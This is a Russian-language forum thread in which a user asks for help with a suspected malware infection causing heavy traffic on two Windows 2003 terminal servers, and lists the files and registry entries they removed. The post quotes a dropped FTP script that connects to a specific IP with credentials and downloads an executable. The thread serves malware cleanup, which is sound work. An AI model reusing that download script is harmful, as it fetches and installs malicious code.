-
Junior Member
- Вес репутации
- 59
Подозрение на вирусняк(Proxy)
Здравствуйте! Вобщем предыстория такая: Есть 2 машины Win2003 server(будем называть одну BS, другую TS) используются в качестве терминального сервера, подключенные к интернету через шлюз на Linux Ubuntu 7.10. Примерно с 18,02 входящий траффик увеличился с 200мб до 1,6Гб-3,5Гб. Проверка разными антивирусами эффекта не давала(AVG, Symantec). Нашел службу(на BS), со странным на званием sock. Она запускалась как "svchost -k sock" и загружала файлы nobema.sys,nobema.dll. Их удалил и удалил ветки реестра, где они встречались. Далее нашёл mycc.exe, mycc080217.exe, mycc080217.dll и ещё длл с похожими именами.Их тоже удалил. В папке Windows нашел файл "y.txt" с содержанием:
open 85.68.217.156 27972
user vikeffm yycqp
get w32mvs.exe
quit
Его тоже удалил. Также в папке Windows были файлы Down(0).exe, EsXP.exe, cc16.ini. Вот содержание последнего:
[mydown]
old_exe=
old_dll=
old_dll32=
fn_exe=C:\WIN\system32\mycc080217.exe
ver=080217
fn_dll_start=C:\WIN\system32\mycc080217.dll
fn_dll=C:\WIN\system32\mycc32.dll
ТОже удалил.Но всё же что-то качает. Т.к. немогу определить какая машина качает, собрал инфу с обеих машин и вот выкладываю. Заранее спасибо за помошь.
П.С. Не могу загрузить файлы, пишет превышен лимит. Это только 3 файла, а мне надо загрузить 6 (с 2х машин). Что делатЬ?
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
1. Для каждой машины своя тема.
2. Логи заархивируйте в один архив и положите сюда http://virusinfo.ifolder.ru/
-
-
Junior Member
- Вес репутации
- 59
ок.
Вот тут архив логов BS http://virusinfo.ifolder.ru/5519218
pass: 123
-
Junior Member
- Вес репутации
- 59
Самое интересное, что в папке Documents and setting в каждом пользователе есть папка WINDOWS а в ней SYSTEM, и когда удаляешь папку Windows, то она восстанавливается.....
-
Это особенности 2003, терминальной сессии.
Павел
AVZ HijackThis помощь с 10-00 до 18-00МСК
Windows7, SEP(work)
WindowsXP KIS(home)
На up не реагирую
-
-
Junior Member
- Вес репутации
- 59
но видать оттуда вирусня и грузится....